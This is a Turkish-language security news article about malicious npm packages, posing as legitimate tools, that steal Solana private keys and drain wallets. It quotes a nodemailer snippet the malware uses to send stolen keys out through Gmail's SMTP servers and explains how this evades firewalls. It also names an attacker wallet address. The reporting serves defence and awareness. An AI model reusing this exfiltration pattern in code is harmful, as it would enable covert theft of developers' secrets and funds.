Soket’in tehdit araştırma ekibi tarafından yakın zamanda ortaya çıkarıldığı üzere, bilgisayar korsanları, Solana özel anahtarlarını Gmail’in güvenilir altyapısı üzerinden sızdırmak üzere tasarlanmış kötü amaçlı npm paketleri dağıttı.
8 Ocak 2025’te ortaya çıkan kampanya, güvenlik önlemlerini atlamak ve hassas kripto para birimi verilerini çalmak için Gmail’in SMTP sunucularına olan güveni istismar ediyor.
@async-mutex/mutex, dexscreener, solana-transaction-toolkit ve solana-stable-web-huks olarak tanımlanan kötü amaçlı paketler, yasal araçlar gibi görünmek için yazım hatası teknikleri kullanıyor.
.webp)
Güvenlik analistleri, tüm bu paketlerin, cüzdan etkileşimleri sırasında özel anahtarlara müdahale ettiğini ve bunları Gmail’in SMTP sunucuları üzerinden aktardığını, bunun da güvenlik duvarları ve uç nokta güvenlik sistemleri tarafından tespit edilmesini zorlaştırdığını keşfetti.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
Teknik Detaylar
Saldırganlar iki farklı yöntem kullandı:
- Anahtar Sızıntısı: @async-mutex/mutex ve dexscreener paketleri, özel Solana anahtarlarının çalınmasına ve iletilmesine odaklanır. Süzme için aşağıdaki kod yapısını kullanırlar:
const transporter = nodemailer.createTransport({
host: "smtp.gmail.com",
port: 465,
secure: true,
auth: {
user: "[email protected]",
pass: "[redacted]",
},
});- Cüzdan Boşaltma: Solana-transaction-toolkit ve solana-stable-web-huks paketleri kurbanların cüzdanlarını programlı olarak boşaltarak bir adım daha ileri gidiyor. Cüzdan içeriğinin %98’e kadarını saldırganın kontrolündeki Solana adresine aktarıyorlar: 3RbBjhVRi8qYoGB5NLiKEszq2ci559so4nPqv2iNjs8Q.
.webp)
Kötü amaçlı paketler 130’dan fazla kez indirildi ve potansiyel olarak çok sayıda geliştirici hesabı ve ortamından ödün verildi. Saldırganlar ayrıca kampanyalarına güvenilirlik kazandırmak için GitHub depolarından yararlandı ve şüphelenmeyen geliştiriciler için bir meşruiyet cephesi yarattı.
Socket’te tehdit istihbaratı analisti Kirill Boychenko şunları doğruladı: “Gmail güvenilir bir e-posta hizmeti olduğundan, bu sızma girişimlerinin smtp.gmail.com’u meşru trafik olarak gören güvenlik duvarları veya uç nokta algılama sistemleri tarafından işaretlenme olasılığı daha düşüktür.”
Bu olay, siber suçluların GitHub ve npm gibi güvenilir platformları kötü amaçlarla istismar etme eğiliminin arttığını ortaya koyuyor. 2024 yılında açık kaynak paket yöneticilerinde bulunan kötü amaçlı paketlerin sayısı 2020 yılına göre %1300 arttı.
Socket araştırmacıları, yapay zeka destekli açıklamaların yanlışlıkla kötü amaçlı yazılımlara güvenilirlik kazandırabileceği ve potansiyel olarak dikkatli kullanıcıları bile zararlı bağımlılıklar yüklemeye yönlendirebileceği konusunda uyardı.
Geliştiricilerin, özellikle indirme sayısı veya yakın yayınlanma tarihleri düşük olan npm paketlerini yüklerken dikkatli olmaları tavsiye edilir. Socket, bağımlılıkları potansiyel tehditlere karşı taramak için GitHub uygulamasını ve CLI araçlarını kullanmanızı önerir.
Ek olarak, kripto para platformları ve bireysel cüzdan sahipleri dikkatli olmalı ve hesaplarının güvende olduğundan emin olmalıdır.
Bağımlılıkların düzenli olarak denetlenmesi ve özel anahtarlara ilişkin sıkı erişim kontrolleri, bu tür risklerin azaltılması açısından çok önemlidir.
Jenkins & Jira’yı Kullanarak Uygulama Güvenliğini CI/CD İş Akışlarınıza Entegre Etme -> Ücretsiz Web Semineri